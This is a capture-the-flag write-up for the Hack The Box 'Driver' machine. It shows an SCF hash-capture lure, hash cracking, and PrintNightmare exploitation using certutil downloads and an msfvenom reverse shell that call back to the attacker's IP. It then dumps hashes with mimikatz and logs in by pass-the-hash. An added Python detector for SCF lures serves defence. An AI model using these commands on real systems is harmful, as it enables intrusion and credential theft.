Hackthebox — Driver Writeup
Start with an Nmap scan of the target machine:
nmap -A -sV -p- 10.10.11.106
Let's try accessing shares over SMB. Anonymous login isn't enabled on this machine.
smbclient -L \\\\10.10.11.106\\
Now, enumerating the web server brings up a login prompt from “MFP Firmware Update Center”, so I tried to search for default credentials!
I didn't end up finding any default credentials for this login, but “admin:admin” worked. Navigating this website, I find an upload directory named “fw_us.php”.
I tried uploading a shell to the website and modifying the request in Burp Suite to exploit a file upload vulnerability, but nothing worked for me. After hours of looking for a different methodology, I tried an SCF (Shell Command File) attack.
[Shell]
Command=2
IconFile=\\10.10.14.4\share\random.ico
[Taskbar]
Command=ToggleDesktop
Naming the file above @test.scf is important because it puts the file at the top of the directory listing so a user will trigger it. Then we can use Responder to capture a hash if this box is vulnerable to an SCF file attack.
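From the defender's side, the upload handler could have rejected this file outright. The following Python check is an added example and is not part of the original writeup or of the box: it inspects an uploaded file's name and content for the markers the SCF lure relies on (a [Shell] section whose IconFile is a UNC path to a host outside an allow-list, plus the “@” prefix used to sort it to the top of the listing). The sample SCF content is constructed from the file shown above; the function names scf_iconfile_host and scan_upload and the trusted_hosts parameter are my own.

```python
import configparser
import re

# Constructed sample: the SCF file from the writeup, as the web server would receive it.
SAMPLE_SCF = r"""[Shell]
Command=2
IconFile=\\10.10.14.4\share\random.ico
[Taskbar]
Command=ToggleDesktop
"""

# A UNC path starts with two backslashes followed by the host name or address.
UNC_HOST_RE = re.compile(r"^\\\\([^\\]+)\\")


def scf_iconfile_host(text: str):
    """Return the host named in [Shell] IconFile if it is a UNC path, else None.

    SCF files are INI-style; configparser lower-cases option names, so
    'IconFile' is looked up as 'iconfile'. strict=False tolerates duplicate keys.
    """
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text)
    except configparser.Error:
        return None  # not INI-shaped at all, so it cannot be an SCF file
    for section in cp.sections():
        if section.lower() != "shell":
            continue
        icon = cp[section].get("iconfile", "")
        m = UNC_HOST_RE.match(icon.strip())
        if m:
            return m.group(1)
    return None


def scan_upload(filename: str, data: bytes, trusted_hosts=()) -> list:
    """Return the list of reasons an uploaded file looks like an SCF lure.

    The checks are independent, so a file renamed to .txt is still caught by
    its content, and a harmless .scf with a local icon only trips the extension rule.
    """
    findings = []
    if filename.lower().endswith(".scf"):
        findings.append("scf-extension")
    if filename.startswith("@"):
        findings.append("sort-to-top-name")  # '@' sorts before letters in a directory listing
    text = data.decode("utf-8", errors="replace")
    host = scf_iconfile_host(text)
    if host is not None:
        trusted = {h.lower() for h in trusted_hosts}
        if host.lower() not in trusted:
            findings.append(f"remote-iconfile:{host}")
    return findings


if __name__ == "__main__":
    for name in ("@test.scf", "notes.txt"):
        print(name, scan_upload(name, SAMPLE_SCF.encode()))
```

Because the content check does not depend on the extension, renaming the lure does not bypass it. Content inspection is only one layer, though: the hash still has to leave the network to reach Responder, so egress filtering of SMB (TCP 445) from the server segment would have stopped this capture even if the upload had been accepted.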
responder -wrf -I tun0
Upload the “@test.scf” file to the website and you'll see captured hashes in Responder!
As you can see, this is a NetNTLMv2 hash (hashcat mode 5600), so we can crack it with hashcat:
hashcat -a 0 -m 5600 hash /usr/share/wordlists/rockyou.txt
The password is cracked!!!
Since port 5985 (WinRM) is open, we can authenticate with evil-winrm:
evil-winrm -u Tony -p liltony -i driver.htb
Privilege Escalation
whoami /priv
We don't see any privileges we can use to escalate. Since we know they have a printer website, most likely the Print Spooler service is running.
Get-Service -Name Spooler
Since the spooler service is running, we can try PrintNightmare (CVE-2021-1675), a new exploit :)
certutil.exe -urlcache -f http://10.10.14.4:8000/CVE-2021-1675.ps1 nightmare.ps1
.\nightmare.ps1
Oh no, we cannot execute scripts on this evil-winrm shell :(. I also tried using a Meterpreter shell, but whenever I loaded the script the shell would crash, so I tried using an Impacket tool called smbserver.py.
msfvenom -p windows/shell/reverse_tcp lhost=10.10.14.4 lport=9999 -f dll > rev.dll
Change your Samba config (/etc/samba/smb.conf) and then start the SMB server:
[global]
client min protocol = CORE
client max protocol = SMB3
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445
[smb]
comment = Samba
path = /tmp
guest ok = yes
read only = no
browsable = yes
force user = smbuser
python3 CVE-2021-1675.py driver.htb/tony:liltony@10.10.11.106 '\\10.10.14.4\smb\venom.dll'
nc -lvnp 9999
certutil.exe -urlcache -f http://10.10.14.4:8000/mimikatz.exe mimikatz.exe
mimikatz.exe
Now we can dump hashes using mimikatz:
lsadump::sam
We can use this Administrator hash to test whether this box is vulnerable to a pass-the-hash attack using evil-winrm:
evil-winrm -u administrator -H d1256cff8b5b5fdb8c327d3b6c3f5017 -i 10.10.11.106
Now we have successfully exploited the box!!! :)